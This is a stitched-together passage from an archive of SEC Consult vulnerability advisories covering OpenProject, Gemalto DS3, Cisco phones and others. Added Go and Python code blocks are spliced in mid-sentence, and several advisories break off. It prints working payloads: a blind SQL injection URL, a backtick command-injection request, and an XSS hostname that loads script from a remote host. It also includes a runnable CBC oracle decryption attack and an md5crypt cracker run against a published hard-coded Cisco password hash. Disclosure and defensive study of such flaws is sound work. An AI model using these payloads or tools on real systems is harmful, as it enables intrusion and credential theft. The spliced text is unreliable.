+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

Finally, a string containing Unicode-encoded "LINE TABULATION" was embedded in
the Armor Header of the message:

(content of cleartext_spoof.asc file):

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512\u000bThis data is part of the header

Message to be signed
-----BEGIN PGP SIGNATURE-----

iQEzBAEBAgAdFiEEAXWUn665cAXgInLZXVs62dBO+u4FAlyeCMMACgkQXVs62dBO
+u6WeQgAvOTZAkwtXCZ2woIbHk+g3fgOiCOF8YtXgZCyDYZgR/JIf1+iCh7lWAjq
9/JcnifNB9lX6hyxy4qoT8loLAHNeoUzSkKiliRMcQFhtfCPInRCRtAnKDfkiA5N
0C9CesJYXoASBRafUgxeI7Q29tVdPNC8WVjJtA72yafu4b63TXKdCcu+TCHtH5lV
l0rqS1JET/+UGycO+gbvegsAoNhmQp8qkFnJTTS6kJgmCs9TJlAmeX1wT8V5f5L+
7pRe45ZBmlA7oi4lylvIp+WG1KJVgrPzeQOkybF2rFRuMxjlvqfO1/4lLrtXgA/7
v8H3ZsqUV9T/HNx5bFPOQJjbOhBVRg==
=Bb6N
-----END PGP SIGNATURE-----

When inserting the "LINE TABULATION" character, the header text after the
attached character looks as if it were p
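One way a verifier can refuse both spoofs shown above, as an added Go example rather than code from golang.org/x/crypto: it parses the Armor Headers of a cleartext-signed message, rejects control characters and unknown digest names, and then requires the digest the signature actually used to be one the headers declared. The three sample messages are constructed after the advisory's files, and their signature block is a placeholder rather than the real signature.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"strings"
	"unicode"
)

const beginLine = "-----BEGIN PGP SIGNED MESSAGE-----"

// Digest names that RFC 4880 section 6.2 allows in a "Hash" Armor Header.
var allowedHashNames = map[string]bool{
	"MD5": true, "SHA1": true, "RIPEMD160": true, "SHA224": true,
	"SHA256": true, "SHA384": true, "SHA512": true,
}

// ParseClearsignHashHeaders reads the Armor Headers of a cleartext-signed
// message and returns the set of declared digest names. It rejects control
// characters inside a header line (the LINE TABULATION trick), any header key
// other than "Hash", and digest names the RFC does not define, so that no
// attacker-chosen text can hide in the header block.
func ParseClearsignHashHeaders(msg string) (map[string]bool, error) {
	sc := bufio.NewScanner(strings.NewReader(msg))
	found := false
	for sc.Scan() {
		if strings.TrimRight(sc.Text(), "\r") == beginLine {
			found = true
			break
		}
	}
	if !found {
		return nil, errors.New("no BEGIN PGP SIGNED MESSAGE line")
	}
	declared := map[string]bool{}
	for sc.Scan() {
		line := strings.TrimRight(sc.Text(), "\r")
		if line == "" {
			return declared, nil // the blank line ends the headers; cleartext follows
		}
		for _, r := range line {
			if unicode.IsControl(r) {
				return nil, fmt.Errorf("control character U+%04X inside armor header", r)
			}
		}
		sep := strings.Index(line, ": ")
		if sep < 0 {
			return nil, fmt.Errorf("malformed armor header %q", line)
		}
		if key := line[:sep]; key != "Hash" {
			return nil, fmt.Errorf("unexpected armor header %q", key)
		}
		for _, name := range strings.Split(line[sep+2:], ",") {
			name = strings.TrimSpace(name)
			if !allowedHashNames[name] {
				return nil, fmt.Errorf("unknown digest name %q", name)
			}
			declared[name] = true
		}
	}
	return nil, errors.New("armor headers not terminated by a blank line")
}

// DeclaredHashAccepts reports whether the digest the signature packet really
// used is one the headers declared; with no "Hash" header RFC 4880 implies MD5.
// This comparison is what the vulnerable clearsign package skipped.
func DeclaredHashAccepts(declared map[string]bool, used string) bool {
	if len(declared) == 0 {
		return used == "MD5"
	}
	return declared[used]
}

// Constructed samples modelled on the advisory's three files. The signature
// block is a placeholder, not the real signature; only the headers matter here.
const sigBlock = "-----BEGIN PGP SIGNATURE-----\n\n<placeholder>\n-----END PGP SIGNATURE-----\n"

var (
	SampleHonest    = beginLine + "\nHash: SHA1\n\nMessage to be signed\n" + sigBlock
	SampleHashSpoof = beginLine + "\nHash: SHA512\n\nMessage to be signed\n" + sigBlock
	SampleTextSpoof = beginLine + "\nHash: SHA512\vThis data is part of the header\n\nMessage to be signed\n" + sigBlock
)

func main() {
	samples := []struct{ name, msg string }{
		{"no_spoof", SampleHonest}, {"hash_spoof", SampleHashSpoof}, {"cleartext_spoof", SampleTextSpoof},
	}
	for _, s := range samples {
		declared, err := ParseClearsignHashHeaders(s.msg)
		if err != nil {
			fmt.Printf("%-16s rejected: %v\n", s.name, err)
			continue
		}
		// All three signatures were really made with SHA-1, as in the advisory.
		fmt.Printf("%-16s declared %v, SHA1 signature accepted: %v\n", s.name, declared, DeclaredHashAccepts(declared, "SHA1"))
	}
}
```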

SEC Consult SA-20190510-0 :: Unauthenticated SQL Injection vulnerability in OpenProject

2019-05-10 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190510-0 >
===
  title: Unauthenticated SQL Injection vulnerability
product: OpenProject
 vulnerable version: 5.0.0 - 8.3.1
  fixed version: 8.3.2 & 9.0.0
 CVE number: CVE-2019-11600
 impact: Critical
   homepage: https://www.openproject.org
  found: 2019-04-17
 by: T. Soo (Office Bangkok)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"OpenProject is the leading open source project management software.
Support your project management process along the entire project
life cycle: From project initiation to closure."

Source: https://www.openproject.org/


Business recommendation:

The vendor provides a patch which should be applied immediately.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected by further security issues.


Vulnerability overview/description:
---
An SQL injection vulnerability has been identified in the web "activities API".
An unauthenticated attacker could successfully perform an attack to extract
potentially sensitive information from the database if OpenProject is configured
not to require authentication for API access.


Proof of concept:
-
Requesting the following URL will trigger a time delay as a proof of concept
for exploiting the blind SQL injection:
http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(%3d


Vulnerable / tested versions:
-
The vulnerability has been identified in OpenProject version 8.3.1 which
was the most current version at the time of discovery.

According to the vendor all versions between 5.0.0 and 8.3.1 are affected.
Older versions (< 5.0.0) are not vulnerable.


Vendor contact timeline:

2019-04-30: Contacting vendor through secur...@openproject.com
2019-04-30: A patch is published in version 8.3.2
2019-05-06: Vendor publishes further details
2019-05-10: Release of security advisory


Solution:
-
The vendor provides a patched version 8.3.2 and a security notice with further
information:

https://www.openproject.org/release-notes/openproject-8-3-2
https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Thanaphon Soo / @2019





SEC Consult SA-20190509-0 :: Multiple Vulnerabilities in Gemalto (Thales Group) DS3 Authentication Server / Ezio Server

2019-05-09 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190509-0 >
===
  title: Multiple Vulnerabilities
product: Gemalto (Thales Group) DS3 Authentication Server / Ezio
 Server
 vulnerable version: Ezio DS3 server https://www.gemalto.com
  found: 2019-02-11
 by: TING Meng Yean (Office Singapore)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
DS3 Authentication Server is an appliance that provides authentication and
end-to-end encryption for online banking and remote transactions.
DS3 has been acquired by Gemalto, and the Authentication Server is now known
as the Gemalto Ezio Server. Gemalto is now part of the Thales Group.

Source: http://www.fisid.ch/products/ds3-main-products.html
Source: https://www.gemalto.com/financial/ebanking/ezio-server
Source:
https://www.thalesgroup.com/en/group/journalist/press-release/thales-completes-acquisition-gemalto-become-global-leader-digital


Business recommendation:

The vendor provides a patch and users of this product are urged to
upgrade to the latest version available.

An in-depth security analysis performed by security professionals is
highly advised, as the software may be affected by further security
issues.


Vulnerability overview/description:
---
The DS3 Authentication Server is prone to several security issues, described
below, that when combined allow a low-privileged application user to upload a
JSP web shell with the access rights of the low privileged Linux system
user "asadmin".

The CVSSv3 scores have been provided by the vendor.


1) Semi-Blind OS Command Injection (Post-authenticated)
- CVE-2019-9156
- CWE-78
- CVSSv3: 6.8 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
The DS3 Authentication Server provides several administration tools to perform
connectivity checks. "TestTelnetConnection.jsp" does not correctly validate the
user input for the "HOST_NAME" and "PORT_NUMBER" parameters, allowing an
attacker to execute arbitrary commands on the server side with the privileges
of the local system user "asadmin".

2) Limited Local File Disclosure (LFD) (Post-authenticated)
- CVE-2019-9157
- CWE-538
- CVSSv3: 5.7 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several administration tools to check the
system's access and error logs. "TailLogs.jsp" does not correctly validate the
user input for the "LOG_TYPE" parameter, allowing an attacker to read arbitrary
local files with the privileges of the local system user "asadmin".

3) Broken Access Control (Post-authenticated)
- CVE-2019-9158
- CWE-284
- CVSSv3: 5.7 (Medium)

https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
The DS3 Authentication Server provides several permission groups, granting
different levels of privileges, from the administrative "dsssAdmin" group to
the low privileged "READ_ONLY" group. A user with the "dsssAdmin" group can see
more functions in the menu of the web portal than a user with the "READ_ONLY"
group. However, the user with the "READ_ONLY" group can access some
"dsssAdmin" functions by replaying the POST or GET request directly.


Proof of concept:
-
1) Semi-Blind OS Command Injection (Post-authenticated) (CVE-2019-9156)

This POC was performed using a user with the "READ_ONLY" group permission.

This exploit also has the following two restrictions:
1) The bash commands injected cannot contain any space (' '/%20).
2) The output of the bash commands injected must be null or cannot contain any
space (' '/%20). However, the tester was able to create complex bash command
payloads without any space (' '/%20) by using a bash trick.

The following request injects the simple OS command payload "whoami" into the
"HOST_NAME" parameter; the HTTP response has the result of the payload,
"asadmin", mixed in. Please note that the OS command payload is enclosed in
backtick (``) characters.


POST /ServerAdmin/TestTelnetConnection.jsp HTTP/1.1
Host: $IP
Cookie: JSESSIONID=
Content-Type: application/x-www-form-urlencoded
Content-Length: 132

CSRFTOKEN=_NAME=127.0.0.1`whoami`_NUMBER=8443_RESULTS=%0D%0A%09%09%09%09%09%09

HTTP/1.1 200 OK
Str

SEC Consult SA-20190205-0 :: Multiple vulnerabilities in OSCI-Transport Library 1.2 for German e-Government

2019-02-05 Thread SEC Consult Vulnerability Lab
A blog post with further information has been released on this topic as well:
https://r.sec-consult.com/osci


SEC Consult Vulnerability Lab Security Advisory < 20190205-0 >
===
  title: Multiple vulnerabilities
product: OSCI-Transport Library 1.2 for German e-Government
 vulnerable version: <=1.8.1
  fixed version: 1.8.3
 CVE number: -
 impact: low - critical
 (highly dependent on the usage scenario)
   homepage: http://www.xoev.de
  found: 2018-09
 by: W. Ettlinger (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
(translated from German)
"The specification of the OSCI-Transport protocol in version 1.2 describes a
secure, vendor-independent and interoperable data exchange format.

To ease the implementation for users in public administration as well as for
vendors of specialised procedures (Fachverfahren), the OSCI 1.2 library is
offered:

The library implements OSCI-Transport in version 1.2 and is therefore
independent of domain-specific content. It is part of the OSCI-Transport
infrastructure. The OSCI-Transport library is intended to be integrated into
specialised procedures (on the administration side) or client systems (on the
customer side)."

Source:
https://www.xoev.de/die_standards/osci_transport/osci_transport_1_2/osci_1_2_bibliothek-2310


Business recommendation:

The OSCI 1.2 Transport Library is intended to provide a secure message exchange
channel over an untrusted network (i.e. the Internet) for German government
agencies.

In 2017 SEC Consult found several critical security vulnerabilities in the OSCI
1.2 Transport library version 1.6.1. These vulnerabilities have been addressed
in version 1.7.1. Further details on these vulnerabilities can be found here:
https://www.sec-consult.com/en/blog/2017/06/german-e-government-details-vulnerabilities/

In 2018 SEC Consult identified vulnerabilities in this library again.
An attacker could use these vulnerabilities to forge signatures of
request-and-response-signed and request-and-response-encrypted messages. Whether
there is an impact to the content-signature and content-encryption was not fully
examined!

As the newly identified vulnerabilities are similar to the vulnerabilities
identified in 2017 and due to high complexity of this library, SEC Consult
suspects further vulnerabilities that have not yet been discovered.

Therefore, SEC Consult strongly recommends that KoSIT and its partners conduct
a full security audit of the software component.


Vulnerability overview/description:
---
1) Insecure Cryptographic Algorithm
KoSIT is in the process of replacing legacy encryption algorithms with AES-GCM.
Currently, the OSCI 1.2 Transport library still supports the following legacy
encryption algorithms:
 * http://www.w3.org/2001/04/xmlenc#tripledes-cbc
 * http://www.w3.org/2001/04/xmlenc#aes128-cbc
 * http://www.w3.org/2001/04/xmlenc#aes192-cbc
 * http://www.w3.org/2001/04/xmlenc#aes256-cbc

All of these algorithms are no longer recommended by the W3C:
"Note: Use of AES GCM is strongly recommended over any CBC block encryption
algorithms as recent advances in cryptanalysis [...] have cast doubt on the
ability of CBC block encryption algorithms to protect plain text when used with
XML Encryption" (https://www.w3.org/TR/xmlenc-core1/)

Although these have been marked as deprecated, AES256-CBC is still used by
default (see Constants.DEFAULT_SYMMETRIC_CIPHER_ALGORITHM).

The Padding Oracle attack that was demonstrated previously by SEC Consult was
found to be no longer exploitable trivially. However, another approach was found
that allows an attacker to bypass transport encryption.

This attack abuses the fact that the server leaks whether a decrypted string
contains a colon (more specifically, whether it is a valid MIME header of the
form Name: Value).

By sending multiple requests and observing whether the decrypted string contains
a colon, an attacker can narrow down the possible values for a single plain text
character. When the number of possible values is one, the plain text byte is
known. The attacker can use this approach to decrypt all characters of a given
cipher text.
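The oracle described above, as an added simulation that is not part of the advisory and not the OSCI library's code: a server that decrypts CBC data and answers only whether the plaintext contains a colon, and an attacker who recovers the complete plaintext from that single bit. The toy Feistel block cipher (standing in for AES-CBC), the key, the IV and the message are all constructed for the demonstration, and padding validation is left out of the model, since the advisory does not document how the library's padding handling interacts with the leak.

```python
"""CBC 'colon oracle' simulation: a one-bit leak (does the decrypted text
contain ':'?) turned into byte-by-byte decryption via CBC malleability.
Added example; the toy cipher is a constructed stand-in for AES-CBC."""
import hashlib

BLOCK = 16
COLON = 0x3A

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def block_encrypt(key, blk):
    # Toy 4-round Feistel network; CBC bit-flipping is identical for AES.
    left, right = blk[:8], blk[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, right, rnd))
    return left + right

def block_decrypt(key, blk):
    left, right = blk[:8], blk[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, left, rnd)), left
    return left + right

def cbc_encrypt(key, iv, plaintext):
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, _xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ciphertext):
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        blk = ciphertext[i:i + BLOCK]
        out.append(_xor(block_decrypt(key, blk), prev))
        prev = blk
    return b"".join(out)

class ColonOracle:
    """Simulated server: decrypts IV || ciphertext and answers one bit, whether
    the plaintext contains ':' ('Name: Value' header). No padding in this model."""
    def __init__(self, key):
        self._key = key
        self.queries = 0

    def __call__(self, iv_and_ct):
        self.queries += 1
        pt = cbc_decrypt(self._key, iv_and_ct[:BLOCK], iv_and_ct[BLOCK:])
        return COLON in pt

def recover_block(oracle, prev_block, ct_block):
    """Recover P_i from (C_{i-1}, C_i): submitting (C_{i-1} XOR mask) || C_i makes
    the server decrypt exactly P_i XOR mask, so each byte is XORed at will."""
    def has_colon(mask):
        return oracle(_xor(prev_block, mask) + ct_block)
    # Phase 1: constant mask k under which P_i XOR mask has no colon at all.
    # k fails only if some byte of P_i equals k ^ 0x3A: at most 16 rejections.
    for k in range(256):
        base = bytes([k]) * BLOCK
        if not has_colon(base):
            break
    else:
        raise RuntimeError("no colon-free baseline mask found")
    # Phase 2: for byte j exactly one g gives P_i[j] ^ g == ':', i.e.
    # g = P_i[j] ^ 0x3A, so the first positive answer pins the byte down.
    recovered = bytearray(BLOCK)
    for j in range(BLOCK):
        for g in range(256):
            probe = bytearray(base)
            probe[j] = g
            if has_colon(bytes(probe)):
                recovered[j] = g ^ COLON
                break
        else:
            raise RuntimeError("byte %d not recovered" % j)
    return bytes(recovered)

def recover_all(oracle, iv, ciphertext):
    blocks = [iv] + [ciphertext[i:i + BLOCK] for i in range(0, len(ciphertext), BLOCK)]
    return b"".join(recover_block(oracle, blocks[i - 1], blocks[i])
                    for i in range(1, len(blocks)))

def demo():
    # Constructed sample: key, IV and a 48-byte (three-block) MIME-style message.
    key = b"constructed-demo-key"
    iv = bytes(range(BLOCK))
    secret = b"Content-Type: text/xml\r\nX-Demo: secret-value-1\r\n"
    oracle = ColonOracle(key)
    recovered = recover_all(oracle, iv, cbc_encrypt(key, iv, secret))
    return recovered, oracle.queries

if __name__ == "__main__":
    print(*demo())
```

Running demo() recovers all 48 bytes with a few thousand queries: the cost is at most one query per candidate byte value, which is why any boolean that depends on decrypted content is enough to break CBC even when the padding check itself leaks nothing.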

2) Signature Bypass
SEC Consult previously demonstrated an XML Signature Wrapping attack. While this
exact attack is no longer possible, another similar attack was identified.

XML signatures are constructed as follows:
 * an element "SignedInfo" contains multiple "Reference" elements, each
   referring to a signed element. The contents 

SEC Consult SA-20190124-0 :: Cross-site scripting in CA Automic Workload Automation Web Interface (AWI)

2019-01-24 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190124-0 >
===
  title: Cross-site scripting
product: CA Automic Workload Automation Web Interface (AWI)
 (formerly Automic Automation Engine, UC4)
 vulnerable version: 12.0, 12.1, 12.2
  fixed version: 12.0.6 HF2, 12.1.3 HF3, 12.2.1 HF1
 CVE number: CVE-2019-6504
 impact: medium
   homepage: https://www.ca.com
  found: 2018-10-15
 by: Marc Nimmerrichter (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"The modern enterprise needs to orchestrate a complex, diverse landscape of
applications, platforms and technologies. Workload automation can prove a
critical differentiator, but only if it provides intelligent automation driven
by data analytics.
[...]
CA Automic Workload Automation gives you the agility, speed, visibility and
scalability needed to respond to the constantly changing technology landscape.
It centrally manages and automates the execution of business processes
end-to-end; across mainframe, cloud and hybrid environments in a way that never
stops—even when doing an upgrade to the next version."

Source: https://www.ca.com/us/products/workload-automation-solution.html


Business recommendation:

Be aware that restrictions on privileges can be bypassed and that attackers may
be able to take over other users' accounts. SEC Consult recommends to apply the
vendor patch as soon as possible.


Vulnerability overview/description:
---
The Automation Engine Web Interface (AWI) is susceptible to a
persistent cross-site scripting attack (XSS). The origin of this vulnerability
is in an outdated version of the Vaadin framework (version 7.7.9), which is
heavily used in the implementation of the UI. This version of the Vaadin
framework is vulnerable to an XSS vulnerability in tooltips [1]. If attackers
can control the content of tooltips created with the framework, they can execute
arbitrary JavaScript code in the context of the user viewing the tooltip. AWI
uses tooltips for various data-fields, e.g. for the title of objects created.
Thus, if a user has the privilege to create or edit objects, they can inject
JavaScript code, which will get executed by other users if they move their
cursor over the text containing the tooltip.

[1] https://github.com/vaadin/framework/issues/8731


Proof of concept:
-
The vulnerability can be reproduced by creating/editing any object in AWI and
using a normal JavaScript payload, e.g. with an onerror handler.

Because tooltips are only shown in AWI when the text length exceeds the column
width, the text needs to be padded with some sample-text to make sure the
JavaScript code gets executed.


Vulnerable / tested versions:
-
The tested version of AWI was 12.2.0.


Vendor contact timeline:

2018-10-18: SEC Consult contacts vendor through v...@ca.com via encrypted email.
2018-10-25: Vendor confirms the receipt of the vulnerability information.
2018-11-22: Vendor confirms the vulnerability and asks for postponement of
            the advisory release date.
2018-12-11: Vendor provides planned patch numbers.
2019-01-17: Vendor informs SEC Consult that patches have been published.
2019-01-18: CA Technologies and SEC Consult define January 24th 2019 as release
            date for the SEC Consult advisory and the CA Technologies Security
            Notice.
2019-01-24: Public release of security advisory


Solution:
-
The vendor provides patched versions:

Automic.Web.Interface 12.0.6 HF2
Automic.Web.Interface 12.1.3 HF3
Automic.Web.Interface 12.2.1 HF1

Available from: https://downloads.automic.com/

The vendor released a security advisory which is available here:
https://support.ca.com/us/product-content/recommended-reading/security-notices/CA20190124-01-security-notice-for-ca-automic-workload-automation.html


Workaround:
---
None


Advisory URL:
-
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive tech

SEC Consult SA-20190109-0 :: Multiple Vulnerabilities in Cisco VoIP Phones (88xx series)

2019-01-09 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20190109-0 >
===
  title: Multiple Vulnerabilities
product: Cisco VoIP Phones, e.g. models 88XX
 vulnerable version: See list of vulnerable devices/firmwares below
  fixed version: 12.5.1 MN
 CVE number: CVE-2018-0461
 impact: high
   homepage: https://www.cisco.com
  found: 10/2018
 by: W. Schober, IoT Inspector (Office Vienna)
         SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"The Cisco IP Phone 8800 Series is a great fit for businesses of all sizes
seeking secure, high-quality, full-featured VoIP. Select models provide
affordable entry to HD video and support for highly-active, in-campus mobile
workers."

Source:
https://www.cisco.com/c/en/us/products/collaboration-endpoints/unified-ip-phone-8800-series/index.html


Business recommendation:

SEC Consult recommends to update the devices to the newest firmware (12.5.1 MN),
where all the documented issues are fixed according to the vendor.

We want to thank Cisco for the very professional response and great
coordination.


Vulnerability overview/description:
---
1) Arbitrary Script Injection
The VOIP phones can be managed directly via the integrated keyboard and the
built-in screen. In the configuration menu a few spots allow users to input
text via the integrated keyboard into text boxes (e.g. Hostname). Those text
input fields are prone to JavaScript-like code injection. An attacker is able
to inject arbitrary payloads via the T9 keyboard.


2) Hard coded and weak secrets
(Identified during an automated firmware analysis by IoT Inspector)
The firmware, which is directly served from Cisco, contains multiple hard coded
password hashes. They are stored in the /etc/passwd file and are hashed using
an outdated algorithm (UNIX MD5+salt). The users are not documented anywhere.
Access via SSH using those credentials is possible.

Due to the outdated algorithm in use (UNIX MD5+Salt) and the very weak password
it was easily possible to brute-force the password within seconds.


3) Undocumented debug functionality
During a manual firmware analysis a few undocumented endpoints in the
built-in web application, which is running on the VOIP phone,
were identified. Those routes lead to parts of the web application that are
neither documented nor officially mentioned anywhere by Cisco. Those parts of
the web application allow an attacker to debug the device and create memory
dumps.


4) Various outdated components with known vulnerabilities
During the check a lot of outdated components were identified by their version
numbers. It is not known which patches got backported by the vendor but Cisco
mentioned that they have implemented some. The potentially affected components
are:

-) wpa_supplicant
-) BusyBox
-) Dnsmasq
-) OpenSSL
-) OpenSSH
-) Linux Kernel Privilege Escalation “pp_key”
-) Linux Kernel Privilege Escalation “Mempodipper”
-) Multiple Linux Kernel CVE entries

Please take a look at the IoT Inspector report for details:
https://r.sec-consult.com/iotinspectorcisco


Proof of concept:
-
1) Arbitrary Script Injection
A lot of settings can be changed directly on the VOIP phone via the built-in
screen. There are also multiple locations, where user-input is parsed and
displayed. It was possible to inject arbitrary (JavaScript) code directly into
the phone UI. As an example the hostname of the VOIP Phone can be changed to
the following value:

hostname"><script src=http://$IP/sec.js onload=exec()></script>

The sec.js gets loaded from the remote host immediately and the exec function
is executed.

< A screenshot can be found online on our website >

Further analysis has not been performed, but depending on the underlying
libraries/system in use, it might be possible to get system level access via
this attack vector.


2) Hard coded and weak secrets
The file at the following path contains a hard coded password for the user
debug:
/_rootfs288xx.12-0-1ES-15.sbn.extracted/squashfs-root/etc/passwd

$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71 (Type: MD5 (Unix))

This hash corresponds to the following clear-text password: debug

The password for the user root and default is also stored in the /etc/passwd:
nCjlgBm7.lvX2 (Type: DES (Unix)) - Users: root, default
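A check that the published md5crypt hash really corresponds to "debug", as an added example rather than tooling from the advisory: a pure-Python implementation of the $1$ scheme run against a small wordlist. The wordlist is constructed; the hash and salt are the ones quoted above.

```python
"""Pure-Python md5crypt ($1$) to verify a /etc/passwd hash against a wordlist.
Added example; not part of the advisory or of any vendor tooling."""
import hashlib

_ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"

def _to64(value, count):
    out = bytearray()
    for _ in range(count):
        out.append(_ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)

def md5crypt(password, salt):
    """FreeBSD/glibc md5crypt: 8-byte salt, 1000 MD5 rounds, 22-char output."""
    salt = salt[:8]
    ctx = hashlib.md5(password + b"$1$" + salt)
    alt = hashlib.md5(password + salt + password).digest()
    length = len(password)
    while length > 0:                       # mix in alt, 16 bytes per 16 chars
        ctx.update(alt[:min(16, length)])
        length -= 16
    bit = len(password)
    while bit:                              # one byte per bit of the length
        ctx.update(b"\0" if bit & 1 else password[:1])
        bit >>= 1
    final = ctx.digest()
    for i in range(1000):                   # fixed, CPU-cheap stretching
        rnd = hashlib.md5()
        rnd.update(password if i & 1 else final)
        if i % 3:
            rnd.update(salt)
        if i % 7:
            rnd.update(password)
        rnd.update(final if i & 1 else password)
        final = rnd.digest()
    f = final
    encoded = b"".join((
        _to64((f[0] << 16) | (f[6] << 8) | f[12], 4),
        _to64((f[1] << 16) | (f[7] << 8) | f[13], 4),
        _to64((f[2] << 16) | (f[8] << 8) | f[14], 4),
        _to64((f[3] << 16) | (f[9] << 8) | f[15], 4),
        _to64((f[4] << 16) | (f[10] << 8) | f[5], 4),
        _to64(f[11], 2),
    ))
    return (b"$1$" + salt + b"$" + encoded).decode()

def crack_md5crypt(hash_string, wordlist):
    """Return the first wordlist entry whose md5crypt matches, else None."""
    if not hash_string.startswith("$1$"):
        raise ValueError("not an md5crypt hash")
    salt = hash_string.split("$")[2].encode()
    for word in wordlist:
        if md5crypt(word.encode(), salt) == hash_string:
            return word
    return None

# Hash of user 'debug' as published above; the wordlist is constructed.
ADVISORY_HASH = "$1$aoJQnypw$vHpN9WTJEQn1UnHzJdoz71"
WORDLIST = ["root", "admin", "cisco", "password", "debug", "default"]

if __name__ == "__main__":
    print(crack_md5crypt(ADVISORY_HASH, WORDLIST))
```

md5crypt is 1000 MD5 rounds with no memory cost, so even a pure-Python loop tests many candidates per second and dedicated crackers test millions; the traditional DES crypt used for root and default truncates passwords to 8 characters and is weaker still, but its plaintext is not published here and is not guessed in this example.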


3) Undocumented debug functionality
The built-in VOIP phone web server offers multiple functionalities for the
end-user. During a manual analysis, undocumented endpoints with critical
functionality got identified. The functionality can be found by visiting
the following endpoint:

SEC Consult SA-20181205-0 :: Inadequate cryptography implementation in Kerio Control VPN protocol

2018-12-05 Thread SEC Consult Vulnerability Lab
SEC Consult Vulnerability Lab Security Advisory < 20181205-0 >
===
  title: Inadequate cryptography implementation
product: Kerio Control VPN protocol
 vulnerable version: <=9.2.7
  fixed version: 9.2.8
 CVE number: -
 impact: High
   homepage: http://www.kerio.com/products/kerio-control
  found: 2018-10
 by: W. Ettlinger (Office Vienna)
     SEC Consult Vulnerability Lab

 An integrated part of SEC Consult
 Europe | Asia | North America

 https://www.sec-consult.com

===

Vendor description:
---
"Protect your network from viruses, malware and malicious activity with Kerio
Control, the easy-to-administer yet powerful all-in-one security solution.

Kerio Control brings together next-generation firewall capabilities -- including
a network firewall and router, intrusion detection and prevention (IPS), gateway
anti-virus, VPN, and web content and application filtering. These comprehensive
capabilities and unmatched deployment flexibility make Kerio Control the ideal
choice for small and mid-sized businesses."

"Link headquarters to remote users and branch offices securely and easily.
Kerio’s own VPN tunneling with dead-simple setup requires minimal configuration,
and provides a high performance network connection. Or, use industry-standard
IPsec/L2TP for connectivity from mobile devices or third-party firewalls.
Enable 2-step verification for an extra layer of security on all forms of
remote access."

Source: http://www.kerio.com/products/kerio-control


Business recommendation:

During a quick evaluation of the Kerio Control VPN protocol, it was apparent
